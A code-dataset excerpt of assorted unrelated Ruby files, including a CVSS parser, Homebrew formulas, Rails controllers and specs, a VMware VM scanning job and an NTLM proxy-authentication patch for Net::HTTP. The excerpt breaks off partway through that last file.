hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
7a499efefef99466ffc7083ca4eb941c3fc0cb8c | 1,129 | # CVSS-Suite, a Ruby gem to manage the CVSS vector
#
# Copyright (c) Siemens AG, 2016
#
# Authors:
# Oliver Hambörger <[email protected]>
#
# This work is licensed under the terms of the MIT license.
# See the LICENSE.md file in the top-level directory.
require 'cvss_suite/cvss2/cvss2'
require 'cvss_suite/cvss3/cvss3'
require 'cvss_suite/version'
require 'cvss_suite/helpers/extensions'
require 'cvss_suite/errors'
require 'cvss_suite/invalid_cvss'
##
# Module of this gem.
##
# Module of this gem.
module CvssSuite
  # Known vector prefixes and the CVSS version each one identifies.
  CVSS_VECTOR_BEGINNINGS = [{ :string => 'AV:', :version => 2 }, { :string => 'CVSS:3.0/', :version => 3 }].freeze

  ##
  # Returns a CVSS class for the given +vector+ string.
  #
  # Returns InvalidCvss when +vector+ is not a String or does not start
  # with a recognized CVSS prefix.
  def self.new(vector)
    return InvalidCvss.new unless vector.is_a? String

    # Pass the vector explicitly instead of stashing it in module-level
    # state (@vector_string), so concurrent calls cannot clobber each other.
    detected_version = version(vector)
    case detected_version
    when 2
      Cvss2.new(vector, detected_version)
    when 3
      Cvss3.new(vector, detected_version)
    else
      InvalidCvss.new
    end
  end

  ##
  # Detects the CVSS version of +vector+ from its prefix.
  # Returns 2, 3, or nil when the prefix is unknown.
  def self.version(vector)
    beginning = CVSS_VECTOR_BEGINNINGS.find { |b| vector.start_with?(b[:string]) }
    beginning && beginning[:version]
  end

  # NOTE: a bare `private` does not apply to methods defined with `def self.`;
  # `private_class_method` is required to actually hide the helper, matching
  # the original intent of the `private` marker.
  private_class_method :version
end
| 22.137255 | 103 | 0.69442 |
bb9af5be1d012f52a16dfd4da365ef33bcefaa8c | 6,347 | # -*- coding: utf-8 -*-
class RailsDataExplorer
  class DataType
    # This is an abstract class. Use sub_classes
    #
    # Responsibilities:
    #  * Provide available charts and statistics for quantitative data type.
    #  * Provide methods for quantitative data type.
    #
    # Collaborators:
    #  * DataSet
    #
    class Quantitative < DataType
      # Returns the chart types that can render quantitative data, including
      # the roles a quantitative dimension may play in each chart and the
      # allowed number of dimensions.
      def all_available_chart_types
        [
          # {
          #   chart_class: Chart::BoxPlot,
          #   chart_roles: [:y],
          #   dimensions_count_min: 1,
          #   dimensions_count_max: 1
          # },
          {
            chart_class: Chart::HistogramQuantitative,
            chart_roles: [:x],
            dimensions_count_min: 1,
            dimensions_count_max: 1
          },
          {
            chart_class: Chart::BoxPlotGroup,
            chart_roles: [:x],
            dimensions_count_min: 2,
            dimensions_count_max: 2,
          },
          {
            chart_class: Chart::Scatterplot,
            chart_roles: [:x, :y, :size],
            dimensions_count_min: 2
          },
          {
            chart_class: Chart::DescriptiveStatisticsTable,
            chart_roles: [:any],
            dimensions_count_min: 1,
            dimensions_count_max: 1
          },
          {
            chart_class: Chart::ParallelCoordinates,
            chart_roles: [:dimension],
            dimensions_count_min: 3,
          },
        ].freeze
      end

      # Computes descriptive statistics for +values+ (numbers, possibly with
      # nil/NaN entries which are excluded from the computation).
      # Returns an Array of Hashes with :label, :value, :ruby_formatter and
      # :table_row (which row of the statistics table the entry belongs to).
      def descriptive_statistics(values)
        # BUGFIX: the previous filter used `Float::NAN == e`, which is always
        # false (NaN compares unequal to everything, itself included), so NaN
        # entries leaked into the stats. Detect NaN via Float#nan? instead.
        non_nil_values = values.reject { |e| e.nil? || (e.is_a?(Float) && e.nan?) }
        stats = ::DescriptiveStatistics::Stats.new(non_nil_values)
        ruby_formatters = {
          integer: Proc.new { |v|
            v.nil? ? 'Null' : number_with_delimiter(v.round)
          },
          decimal: Proc.new { |v|
            case
            when v.nil?
              'Null'
            when v.is_a?(Float) && v.nan?
              'NaN'
            else
              number_with_precision(
                v,
                precision: 3,
                significant: true,
                strip_insignificant_zeros: true,
                delimiter: ','
              )
            end
          },
          # Same NaN bugfix applies here: previously `Float::NAN == v` never
          # matched, so NaN values were passed through unformatted.
          pass_through: Proc.new { |v| (v.nil? || (v.is_a?(Float) && v.nan?)) ? 'NaN' : v },
        }
        [
          { label: 'Min', value: stats.min, ruby_formatter: ruby_formatters[:decimal], table_row: 1 },
          { label: '1%ile', value: stats.value_from_percentile(1), ruby_formatter: ruby_formatters[:decimal], table_row: 1 },
          { label: '5%ile', value: stats.value_from_percentile(5), ruby_formatter: ruby_formatters[:decimal], table_row: 1 },
          { label: '10%ile', value: stats.value_from_percentile(10), ruby_formatter: ruby_formatters[:decimal], table_row: 1 },
          { label: '25%ile', value: stats.value_from_percentile(25), ruby_formatter: ruby_formatters[:decimal], table_row: 1 },
          { label: 'Median', value: stats.median, ruby_formatter: ruby_formatters[:decimal], table_row: 1 },
          { label: '75%ile', value: stats.value_from_percentile(75), ruby_formatter: ruby_formatters[:decimal], table_row: 1 },
          { label: '90%ile', value: stats.value_from_percentile(90), ruby_formatter: ruby_formatters[:decimal], table_row: 1 },
          { label: '95%ile', value: stats.value_from_percentile(95), ruby_formatter: ruby_formatters[:decimal], table_row: 1 },
          { label: '99%ile', value: stats.value_from_percentile(99), ruby_formatter: ruby_formatters[:decimal], table_row: 1 },
          { label: 'Max', value: stats.max, ruby_formatter: ruby_formatters[:decimal], table_row: 1 },
          { label: 'Range', value: stats.range, ruby_formatter: ruby_formatters[:decimal], table_row: 2 },
          { label: 'Mean', value: stats.mean, ruby_formatter: ruby_formatters[:decimal], table_row: 2 },
          { label: 'Mode', value: stats.mode, ruby_formatter: ruby_formatters[:decimal], table_row: 2 },
          # Count deliberately reports the total input size, including
          # excluded nil/NaN entries.
          { label: 'Count', value: values.length, ruby_formatter: ruby_formatters[:integer], table_row: 2 },
          { label: 'Sum', value: non_nil_values.sum, ruby_formatter: ruby_formatters[:decimal], table_row: 2 },
          { label: 'Variance', value: stats.variance, ruby_formatter: ruby_formatters[:decimal], table_row: 2 },
          { label: 'Std. dev.', value: stats.standard_deviation, ruby_formatter: ruby_formatters[:decimal], table_row: 2 },
          { label: 'Rel. std. dev.', value: stats.relative_standard_deviation, ruby_formatter: ruby_formatters[:decimal], table_row: 2 },
          { label: 'Skewness', value: stats.skewness, ruby_formatter: ruby_formatters[:decimal], table_row: 2 },
          { label: 'Kurtosis', value: stats.kurtosis, ruby_formatter: ruby_formatters[:decimal], table_row: 2 },
          # Filler cell so both table rows have the same number of columns.
          { label: '', value: '', ruby_formatter: ruby_formatters[:pass_through], table_row: 2 },
        ]
      end

      # Returns an object that describes a statistics table.
      # Emits alternating header/value rows for the two logical stat rows.
      def descriptive_statistics_table(values)
        desc_stats = descriptive_statistics(values)
        table = Utils::RdeTable.new([])
        [1, 2].each do |table_row|
          table.rows << Utils::RdeTableRow.new(
            :tr,
            desc_stats.find_all { |e| table_row == e[:table_row] }.map { |stat|
              Utils::RdeTableCell.new(:th, stat[:label], ruby_formatter: Proc.new { |e| e }, css_class: 'rde-cell-label')
            },
            css_class: 'rde-column_header'
          )
          table.rows << Utils::RdeTableRow.new(
            :tr,
            desc_stats.find_all { |e| table_row == e[:table_row] }.map { |stat|
              Utils::RdeTableCell.new(:td, stat[:value], ruby_formatter: stat[:ruby_formatter], css_class: 'rde-cell-value')
            },
            css_class: 'rde-data_row'
          )
        end
        table
      end

      # Abstract: concrete subclasses must provide the axis tick format.
      def axis_tick_format(values)
        raise "Implement me in sub_class"
      end

      # Picks a log or linear axis scale for the given renderer.
      def axis_scale(data_series, modification, d3_or_vega)
        # Log scales can't handle 0 values
        if data_series.min_val(modification) > 0.0 && data_series.has_large_dynamic_range?(modification)
          { d3: 'd3.scale.log', vega: 'log' }[d3_or_vega]
        else
          { d3: 'd3.scale.linear', vega: 'linear' }[d3_or_vega]
        end
      end
    end
  end
end
| 43.176871 | 137 | 0.582795 |
6176311deefe1d5e853571809df703f2daafd82c | 933 | # encoding: UTF-8
# frozen_string_literal: true
module API
  module V2
    # Minimal test-only endpoints mounted for the request specs below:
    # GET /null returns an empty body; GET /broken raises a coded API error.
    class Mount
      get('/null') { '' }
      get('/broken') { raise Error, code: 2_014_310, text: 'MtGox bankrupt' }
    end
  end
end
# Request specs covering middleware wiring and JSON error rendering for the
# test-only Mount endpoints defined above.
describe API::V2::Mount, type: :request do
  let(:middlewares) { API::V2::Mount.middleware }

  it 'should use auth and attack middleware' do
    # drop(1) skips the first middleware entry inserted by the framework.
    expect(middlewares.drop(1)).to eq [[:use, API::V2::Auth::Middleware], [:use, Rack::Attack]]
  end

  context 'handle exception on request processing' do
    it 'should render json error message' do
      get '/api/v2/broken'
      expect(response.code).to eq '400'
      expect(JSON.parse(response.body)).to eq('error' => { 'code' => 2_014_310, 'message' => 'MtGox bankrupt' })
    end
  end

  context 'handle exception on request routing' do
    it 'should render json error message' do
      get '/api/v2/non/exist'
      expect(response.code).to eq '404'
    end
  end
end
| 27.441176 | 112 | 0.648446 |
4a0687d1ebc63e46704f474eecede0dddf4437a0 | 868 | class Bingrep < Formula
desc "Greps through binaries from various OSs and architectures"
homepage "https://github.com/m4b/bingrep"
url "https://github.com/m4b/bingrep/archive/v0.8.2.tar.gz"
sha256 "5647d78166a2d768b98ae03bd40427f2263b28b81213882d42f638c5b96619e2"
license "MIT"
bottle do
cellar :any_skip_relocation
sha256 "38cb293ea71d8d11e422838e378cb67b09334590ed501e45b9a0f6da7d70f3ac" => :catalina
sha256 "cef323546a1e6978ca5a67f9f18333819e318bbe136d9ba210c1fbd89f4af82f" => :mojave
sha256 "d63ae62eff912723629b9d991fb77771f700ee306cf3b3cc40a934e3f2f13dd1" => :high_sierra
sha256 "82493ec0332b42ccaa1cf0a4415517a986cb4edcdad43e9edfd04da557c7684f" => :x86_64_linux
end
depends_on "rust" => :build
def install
system "cargo", "install", *std_cargo_args
end
test do
system bin/"bingrep", bin/"bingrep"
end
end
| 33.384615 | 94 | 0.786866 |
abc0561361f33be3694b05192155216f510fa558 | 75 | require "movement/version"
# Top-level namespace for the Movement gem (implementation pending).
module Movement
  # Your code goes here...
end
| 12.5 | 26 | 0.733333 |
f8e76ff1613dc6558660fa7b5e6450b3ffeb2eaf | 39 | module Sengiri
VERSION = "0.1.0"
end
| 9.75 | 19 | 0.666667 |
87dc27ec73915f9184e91ad60b662038199d126c | 2,086 | # frozen_string_literal: true
require "guard/cli/environments/bundler"
require "guard/commander"
require "guard/guardfile/generator"
module Guard
  module Cli
    module Environments
      # CLI environment used when the working directory contains a usable
      # Guard setup; drives `guard start` and `guard init`.
      class Valid
        # options:: parsed CLI options hash (e.g. :no_bundler_warning, :bare)
        def initialize(options)
          @options = options
        end

        # Starts Guard with the stored CLI options.
        # Known DSL/evaluator errors are reported as user-facing messages
        # (no backtrace) and abort the process.
        def start_guard
          # TODO: just to make sure tests are ok
          Bundler.new.verify unless @options[:no_bundler_warning]
          Guard.start(@options)
        rescue Dsl::Error,
               Guardfile::Evaluator::NoPluginsError,
               Guardfile::Evaluator::NoGuardfileError,
               Guardfile::Evaluator::NoCustomGuardfile => e
          # catch to throw message instead of call stack
          UI.error(e.message)
          abort
        end

        # Creates a Guardfile when missing and initializes plugin templates.
        # Returns a process exit code: 0 on success, 1 on template errors.
        def initialize_guardfile(plugin_names = [])
          bare = @options[:bare]
          Guard.init(@options)
          session = Guard.state.session

          generator = Guardfile::Generator.new
          begin
            # First evaluation: detect whether a Guardfile already exists.
            Guardfile::Evaluator.new(session.evaluator_options).evaluate
          rescue Guardfile::Evaluator::NoGuardfileError
            generator.create_guardfile
          rescue Guard::Guardfile::Evaluator::NoPluginsError
            # Do nothing - just the error
          end

          return 0 if bare # 0 - exit code

          # Evaluate because it might have existed and creating was skipped
          begin
            Guardfile::Evaluator.new(session.evaluator_options).evaluate
          rescue Guard::Guardfile::Evaluator::NoPluginsError
          end

          begin
            if plugin_names.empty?
              generator.initialize_all_templates
            else
              plugin_names.each do |plugin_name|
                generator.initialize_template(plugin_name)
              end
            end
          rescue Guardfile::Generator::Error => e
            UI.error(e.message)
            return 1
          end

          # TODO: capture exceptions to show msg and return exit code on
          # failures
          0 # exit code
        end
      end
    end
  end
end
| 28.972222 | 75 | 0.59348 |
617458c5dda722a8912bcb923a84ced01aa1fe85 | 2,180 | class Duff < Formula
desc "Quickly find duplicates in a set of files from the command-line"
homepage "https://duff.sourceforge.io/"
url "https://downloads.sourceforge.net/project/duff/duff/0.5.2/duff-0.5.2.tar.gz"
sha256 "15b721f7e0ea43eba3fd6afb41dbd1be63c678952bf3d80350130a0e710c542e"
bottle do
sha256 cellar: :any_skip_relocation, arm64_monterey: "668a1d24b8d48ec315a92dff088af45703c461c93fb8b865ff76eb7e932eab03"
sha256 cellar: :any_skip_relocation, arm64_big_sur: "a56fadd23b68f73dc6800cb2d13435b8bc8893b3b1cf3ce48660663840cab8a9"
sha256 cellar: :any_skip_relocation, monterey: "486d0ff26e56d7a23692b429a3441d965f61bf8e48038f5d582c9a0da5c6379e"
sha256 cellar: :any_skip_relocation, big_sur: "37eec490b6068cb6cb98f430740042712203e2bd2db39bfe25eeb5143f444965"
sha256 cellar: :any_skip_relocation, catalina: "9c383331f4c0f5f8efb8364079dd76994d6e210e4bdd4d6f8e96c53d55ee88d0"
sha256 cellar: :any_skip_relocation, mojave: "b2f5b9c19bb74d92c6b43482b77bf6d852355b83ddfda7ca4f6340a8075067f4"
sha256 cellar: :any_skip_relocation, high_sierra: "a30c57c79b3cef30518fccc5227e954dd9a2383e15458f85706733dcc1fe188a"
sha256 cellar: :any_skip_relocation, sierra: "2af1262a9b02e687c0efc14eed3d837920ab746fe8fca9b12b9361c4729f06ef"
sha256 cellar: :any_skip_relocation, el_capitan: "8a469e92a6303d80752ebc80ade382261d263b9c7226ca6652eddc8954e5ff2f"
sha256 cellar: :any_skip_relocation, yosemite: "927ba61ce39cf9be33f796197063b1a6865bbc2db2f4b1340ad6786acf0494df"
sha256 x86_64_linux: "d2e177f7c17a8dad92be2c7597844a572e4db8a8c4bba5db934843325c5edc90"
end
def install
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}",
"--mandir=#{man}"
system "make", "install"
end
test do
expected = <<~EOS
2 files in cluster 1 (6 bytes, digest 8843d7f92416211de9ebb963ff4ce28125932878)
cmp1
cmp2
EOS
(testpath/"cmp1").write "foobar"
(testpath/"cmp2").write "foobar"
assert_equal expected, shell_output("#{bin}/duff cmp1 cmp2")
end
end
| 53.170732 | 123 | 0.758257 |
080bc3b23e7b3493bb970eefe7ef7dbc7adf9d30 | 916 | class RoastsController < ApplicationController
def index
roasts = Roaster.find(params[:roaster_id]).roast
render json: { status: 200, roasts: roasts }
end
def new
roast = Roast.new
end
def destroy
roaster = Roaster.find(params[:roaster_id])
roast = roaster.roast.find(params[:id])
roast.destroy
redirect_to roaster_path(roaster)
end
def update
roast = Roast.find(params[:id])
roast.update(roast_params)
render(json: { roast: roast })
end
def create
roaster = Roaster.find(params[:roaster_id])
roast = roaster.roast.create(roast_params)
redirect_to roaster_path(roaster)
end
def show
@roasts = Roast.find(params[:id])
render json: { status: 200, roast: @roasts }
end
private
def roast_params
params.permit(:name, :picture, :notes, :origin, :description, :roaster_id, :beanType, :productionDate, :published)
end
end
| 21.809524 | 118 | 0.684498 |
ab7301fc6c16bafac69cd894d1ebe7074000c91d | 9,385 | class ManageIQ::Providers::Vmware::InfraManager::Scanning::Job < VmScan
# Make updates to default state machine to take into account snapshots
def load_transitions
super.tap do |transitions|
transitions.merge!(
:start_snapshot => {'before_scan' => 'snapshot_create'},
:snapshot_complete => {'snapshot_create' => 'check_host_credentials',
'snapshot_delete' => 'synchronizing'},
:start_scan => {'check_host_credentials' => 'scanning'},
:snapshot_delete => {'after_scan' => 'snapshot_delete'},
:data => {'snapshot_create' => 'scanning',
'scanning' => 'scanning',
'snapshot_delete' => 'snapshot_delete',
'synchronizing' => 'synchronizing',
'finished' => 'finished'}
)
end
end
def before_scan
queue_signal(:start_snapshot, role: "ems_operations", queue_name: vm.queue_name_for_ems_operations)
end
def after_scan
queue_signal(:snapshot_delete, role: "ems_operations", queue_name: vm.queue_name_for_ems_operations)
end
def call_snapshot_create
_log.info("Enter")
begin
context[:snapshot_mor] = nil
options[:snapshot] = :skipped
options[:use_existing_snapshot] = false
begin
proxy = MiqServer.find(miq_server_id)
if proxy && proxy.forceVmScan
options[:snapshot] = :smartProxy
_log.info("Skipping snapshot creation, it will be performed by the SmartProxy")
context[:snapshot_mor] = options[:snapshot_description] = snapshotDescription("(embedded)")
log_start_user_event_message
else
set_status("Creating VM snapshot")
return unless create_snapshot
end
end
signal(:snapshot_complete)
rescue Timeout::Error
msg = case options[:snapshot]
when :smartProxy, :skipped then "Request to log snapshot user event with EMS timed out."
else "Request to create snapshot timed out"
end
_log.error(msg)
signal(:abort, msg, "error")
rescue => err
_log.log_backtrace(err)
signal(:abort, err.message, "error")
end
end
def check_host_credentials
_log.info("Enter")
begin
host = MiqServer.find(miq_server_id)
# Send down metadata to allow the host to make decisions.
scan_args = create_scan_args
options[:ems_list] = scan_args["ems"]
options[:categories] = vm.scan_profile_categories(scan_args["vmScanProfiles"])
# If the host supports VixDisk Lib then we need to validate that the host has the required credentials set.
ems_list = scan_args["ems"]
scan_ci_type = ems_list['connect_to']
if host.is_vix_disk? && ems_list[scan_ci_type] && (ems_list[scan_ci_type][:username].nil? || ems_list[scan_ci_type][:password].nil?)
context[:snapshot_mor] = nil unless options[:snapshot] == :created
raise _("no credentials defined for %{type} %{name}") % {:type => scan_ci_type,
:name => ems_list[scan_ci_type][:hostname]}
end
if ems_list[scan_ci_type]
_log.info("[#{host.name}] communicates with [#{scan_ci_type}:#{ems_list[scan_ci_type][:hostname]}"\
"(#{ems_list[scan_ci_type][:address]})] to scan vm [#{vm.name}]")
end
signal(:start_scan)
rescue Timeout::Error
message = "timed out attempting to scan, aborting"
_log.error(message)
signal(:abort, message, "error")
return
rescue => message
_log.log_backtrace(message)
signal(:abort, message.message, "error")
end
end
def config_snapshot
snapshot = {"use_existing" => options[:use_existing_snapshot],
"description" => options[:snapshot_description]}
snapshot['create_free_percent'] = ::Settings.snapshots.create_free_percent
snapshot['remove_free_percent'] = ::Settings.snapshots.remove_free_percent
snapshot['name'] = context[:snapshot_mor]
snapshot
end
def create_scan_args
super.tap do |scan_args|
scan_args['snapshot'] = config_snapshot
scan_args['snapshot']['forceFleeceDefault'] = false if vm.scan_via_ems? && vm.template?
end
end
def call_snapshot_delete
_log.info("Enter")
# TODO: remove snapshot here if Vm was running
if context[:snapshot_mor]
mor = context[:snapshot_mor]
context[:snapshot_mor] = nil
if options[:snapshot] == :smartProxy
set_status("Snapshot delete was performed by the SmartProxy")
else
set_status("Deleting VM snapshot: reference: [#{mor}]")
end
if vm.ext_management_system
_log.info("Deleting snapshot: reference: [#{mor}]")
begin
delete_snapshot(mor)
rescue Timeout::Error
msg = "Request to delete snapshot timed out"
_log.error(msg)
rescue => err
_log.error(err.to_s)
return
end
unless options[:snapshot] == :smartProxy
_log.info("Deleted snapshot: reference: [#{mor}]")
set_status("Snapshot deleted: reference: [#{mor}]")
end
else
_log.error("Deleting snapshot: reference: [#{mor}], No Providers available to delete snapshot")
set_status("No Providers available to delete snapshot, skipping", "error")
end
else
set_status("Snapshot was not taken, delete not required") if options[:snapshot] == :skipped
log_end_user_event_message
end
signal(:snapshot_complete)
end
def delete_snapshot(mor)
if mor
begin
if vm.ext_management_system
if options[:snapshot] == :smartProxy
log_end_user_event_message
delete_snapshot_by_description(mor)
else
user_event = end_user_event_message
vm.ext_management_system.vm_remove_snapshot(vm, :snMor => mor, :user_event => user_event)
end
else
raise _("No Providers available to delete snapshot")
end
rescue => err
_log.error(err.message)
_log.log_backtrace(err, :debug)
end
else
log_end_user_event_message
end
end
def delete_snapshot_by_description(mor)
if mor
ems_type = 'host'
options[:ems_list] = vm.ems_host_list
miqVimHost = options[:ems_list][ems_type]
miqVim = nil
# Make sure we were given a host to connect to and have a non-nil encrypted password
if miqVimHost && !miqVimHost[:password].nil?
server = miqVimHost[:hostname] || miqVimHost[:ipaddress]
begin
password_decrypt = ManageIQ::Password.decrypt(miqVimHost[:password])
require 'VMwareWebService/MiqVim'
miqVim = MiqVim.new(server, miqVimHost[:username], password_decrypt)
vimVm = miqVim.getVimVm(vm.path)
vimVm.removeSnapshotByDescription(mor, true) unless vimVm.nil?
ensure
vimVm.release if vimVm rescue nil
miqVim.disconnect unless miqVim.nil?
end
end
end
end
def process_cancel(*args)
begin
delete_snapshot_and_reset_snapshot_mor("canceling")
super
rescue => err
_log.log_backtrace(err)
end
super
end
def process_abort(*args)
begin
delete_snapshot_and_reset_snapshot_mor("aborting")
super
rescue => err
_log.log_backtrace(err)
end
super
end
def snapshot_complete
if state == 'check_host_credentials'
check_host_credentials
else
call_synchronize
end
end
# All other signals
alias_method :start_snapshot, :call_snapshot_create
alias_method :snapshot_delete, :call_snapshot_delete
private
def create_snapshot
if vm.ext_management_system
sn_description = snapshotDescription
_log.info("Creating snapshot, description: [#{sn_description}]")
user_event = start_user_event_message
options[:snapshot] = :server
begin
# TODO: should this be a vm method?
sn = vm.ext_management_system.vm_create_evm_snapshot(vm, :desc => sn_description, :user_event => user_event).to_s
rescue Exception => err
msg = "Failed to create evm snapshot with EMS. Error: [#{err.class.name}]: [#{err}]"
_log.error(msg)
return false
end
context[:snapshot_mor] = sn
_log.info("Created snapshot, description: [#{sn_description}], reference: [#{context[:snapshot_mor]}]")
set_status("Snapshot created: reference: [#{context[:snapshot_mor]}]")
options[:snapshot] = :created
options[:use_existing_snapshot] = true
return true
else
signal(:abort, "No Providers available to create snapshot, skipping", "error")
return false
end
end
def snapshotDescription(type = nil)
Snapshot.evm_snapshot_description(jobid, type)
end
def delete_snapshot_and_reset_snapshot_mor(log_verb)
unless context[:snapshot_mor].nil?
mor = context[:snapshot_mor]
context[:snapshot_mor] = nil
set_status("Deleting snapshot before #{log_verb} job")
delete_snapshot(mor)
end
end
end
| 33.280142 | 138 | 0.63154 |
2845190d428d1da68b539c2c062740c09cf7114f | 221 | class CreateStorePrices < ActiveRecord::Migration[5.1]
def change
create_table :store_prices do |t|
t.references :item
t.references :store
t.float :price
t.timestamps
end
end
end
| 18.416667 | 54 | 0.647059 |
f86992c41ce8e8f045acf097685ad0f2daa2bf1c | 346 | Spree::SubscriptionInterval.create( :name =>"1 Month", :times => 1, :time_unit => 3 )
# Seed the remaining subscription intervals.
# NOTE(review): time_unit 3 appears to denote months — confirm against the
# SubscriptionInterval time_unit enum.
Spree::SubscriptionInterval.create( :name =>"2 Months", :times => 2, :time_unit => 3 )
Spree::SubscriptionInterval.create( :name =>"3 Months", :times => 3, :time_unit => 3 )
Spree::SubscriptionInterval.create( :name =>"4 Months", :times => 4, :time_unit => 3 )
18de3e700602c24dbc1a103f9ca531bfef0bf6c8 | 47 | class Class1
def method_of_class_1
end
end
| 9.4 | 23 | 0.787234 |
4a20f4aab5286b7efa63ebd2916086a7c3767044 | 1,529 | class <%= "#{file_name.capitalize+ "editor" + "Controller"}" %> < ApplicationController
  # Generator template (ERB): <%%= ... %> tags are expanded by the Rails
  # generator at generation time. The rendered controller manages a tree of
  # menu items: add/edit/delete/publish and positional reordering.

  # Renders the "add child" form for the selected menu item.
  def add_menu_form
    @menu_id=params[:<%="#{file_name}"%>_id]
  end

  # Adds a child item and recomputes absolute positions/depths of the tree.
  def add_menu
    <%= file_name.capitalize %>.add_child(params[:<%="#{file_name}"%>_id].to_i, params[:title], params[:link])
    <%= file_name.capitalize %>.determine_abs_position_and_depth
  end

  # Toggles the published flag of the selected item.
  def publish_menu
    m=<%= file_name.capitalize %>.find(params[:<%="#{file_name}"%>_id].to_i)
    if(m.published)
      m.setNotPublished
    else
      m.setPublished
    end
  end

  # Deletes an item, reselecting its parent afterwards.
  def delete_menu
    temp=<%= file_name.capitalize %>.find(params[:<%="#{file_name}"%>_id]).parent_id
    <%= file_name.capitalize %>.delete_item(params[:<%="#{file_name}"%>_id].to_i)
    <%= file_name.capitalize %>.determine_abs_position_and_depth
    session[:<%="#{file_name}"%>_id]=temp
    params[:<%="#{file_name}"%>_id]=temp
  end

  # Renders the edit form for the selected menu item.
  def edit_menu_form
    @menu_id=params[:<%="#{file_name}"%>_id]
  end

  # Updates title/link/parent of an item and recomputes tree positions.
  def edit_menu
    <%= file_name.capitalize %>.edit(params[:<%="#{file_name}"%>_id].to_i, params[:parent_id].to_i, params[:title], params[:link])
    <%= file_name.capitalize %>.determine_abs_position_and_depth
  end

  # Moves an item one position up among its siblings.
  def up_menu
    <%= file_name.capitalize %>.position_up(params[:<%="#{file_name}"%>_id].to_i)
    <%= file_name.capitalize %>.determine_abs_position_and_depth
  end

  # Moves an item one position down among its siblings.
  def down_menu
    <%= file_name.capitalize %>.position_down(params[:<%="#{file_name}"%>_id].to_i)
    <%= file_name.capitalize %>.determine_abs_position_and_depth
  end
end
| 30.58 | 130 | 0.6586 |
ed70114d5c84618eb8abf65645cda93948324760 | 985 | class Librsync < Formula
desc "Library that implements the rsync remote-delta algorithm"
homepage "https://librsync.github.io/"
url "https://github.com/librsync/librsync/archive/v2.1.0.tar.gz"
sha256 "f701d2bab3d7471dfea60d29e9251f8bb7567222957f7195af55142cb207c653"
bottle do
cellar :any_skip_relocation
sha256 "addc0756351610330977decc0ae1b31c6f2928e527faef5d38230f623b88dc07" => :mojave
sha256 "9e813729589ad923be1fd040cd54a5c5083a824c05f09f7f8a77fc529a9516ce" => :high_sierra
sha256 "a4523e8193af9a30986f706d22d53b937d3ffc9c1bfa5fda05d54654a616a0ef" => :sierra
sha256 "f14d994d007af6c8217ba2ed616f89e82b1642dcc8ec2691a87d51e5de2e0179" => :x86_64_linux
end
depends_on "cmake" => :build
depends_on "popt"
def install
system "cmake", ".", *std_cmake_args
system "make", "install"
man1.install "doc/rdiff.1"
man3.install "doc/librsync.3"
end
test do
assert_match version.to_s, shell_output("#{bin}/rdiff -V")
end
end
| 33.965517 | 94 | 0.771574 |
2115d94ca0f1fac03d46adc91087bff513b9ec4c | 1,154 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'xcbuildfaster/version'
# Gem packaging metadata for XCBuildFaster.
Gem::Specification.new do |spec|
  spec.name          = "XCBuildFaster"
  spec.version       = XCBuildFaster::VERSION
  spec.authors       = ["Dave Schukin"]
  spec.email         = ["[email protected]"]
  spec.summary       = %q{Tweaks your Xcode workspace to make it compile faster.}
  spec.description   = %q{Tweaks your Xcode workspace to make it compile faster.}
  spec.homepage      = "https://github.com/schukin/xcbuildfaster"
  spec.license       = "MIT"

  spec.files         = `git ls-files -z`.split("\x0")
  spec.executables   = ['xcbuildfaster'] #spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
  spec.test_files    = spec.files.grep(%r{^(test|spec|features)/})
  spec.require_paths = ["lib"]

  spec.add_dependency 'xcodeproj'
  spec.add_dependency 'libxml-ruby' # faster XML parsing w/ xcodeproj
  spec.add_development_dependency "bundler", "~> 1.6"
  spec.add_development_dependency "rake"
  spec.add_development_dependency "rspec"
  spec.add_development_dependency "rspec-nc"
end
| 38.466667 | 93 | 0.688042 |
ed453a4fcd819499f8d7da26bf86a8bcb807bd9a | 112 | #!/usr/bin/env ruby
puts $*[0][2..-1].split('').each_slice(2).map {|_| '0x%02X' % _.join.to_i(16) }.join(', ')
| 28 | 90 | 0.535714 |
1aad5c6502a6857dedfa59dbf2ad13a291490600 | 7,776 | require "net/http/proxy_authenticate_ntlm/version"
require "net/http"
require "net/https"
require "net/ntlm"
require "kconv"
# monkey patching Net::NTLM
class << Net::NTLM
  # Re-implements NTLM's DES step on top of OpenSSL::Cipher: encrypts
  # +plain+ once per key in +keys+ and returns the list of ciphertexts.
  # NOTE(review): the single cipher object is re-initialized on each
  # iteration via #encrypt/#key=, and #final is never called — this assumes
  # single-block DES input; confirm against net-ntlm's expectations.
  def apply_des(plain, keys)
    dec = OpenSSL::Cipher::DES.new
    keys.map {|k|
      dec.encrypt
      dec.key = k
      dec.update(plain)
    }
  end
end
module Net
class HTTP
module ProxyAuthenticateNTLM
def self.enabled?
@enabled
end
def self.enabled=(v)
@enabled = !!v
end
self.enabled = false
def request(req, body = nil, &block) # :yield: +response+
return super unless ProxyAuthenticateNTLM.enabled?
unless started?
start {
req['connection'] ||= 'close'
return request(req, body, &block)
}
end
req.set_body_internal body
res = transport_request(req, &block)
if sspi_auth?(res)
sspi_auth(req)
res = transport_request(req, &block)
elsif ntlm_auth?(res)
ntlm_auth(req)
res = transport_request(req, &block)
end
res
end
def connect
return super unless ProxyAuthenticateNTLM.enabled?
if proxy? then
conn_addr = proxy_address
conn_port = proxy_port
else
conn_addr = conn_address
conn_port = port
end
D "opening connection to #{conn_addr}:#{conn_port}..."
s = Timeout.timeout(@open_timeout, Net::OpenTimeout) {
begin
TCPSocket.open(conn_addr, conn_port, @local_host, @local_port)
rescue => e
raise e, "Failed to open TCP connection to " +
"#{conn_addr}:#{conn_port} (#{e.message})"
end
}
s.setsockopt(Socket::IPPROTO_TCP, Socket::TCP_NODELAY, 1)
D "opened"
if use_ssl?
if proxy?
connect_proxy(s, conn_address)
end
ssl_parameters = Hash.new
iv_list = instance_variables
SSL_IVNAMES.each_with_index do |ivname, i|
if iv_list.include?(ivname)
value = instance_variable_get(ivname)
unless value.nil?
ssl_parameters[SSL_ATTRIBUTES[i]] = value
end
end
end
@ssl_context = OpenSSL::SSL::SSLContext.new
@ssl_context.set_params(ssl_parameters)
@ssl_context.session_cache_mode =
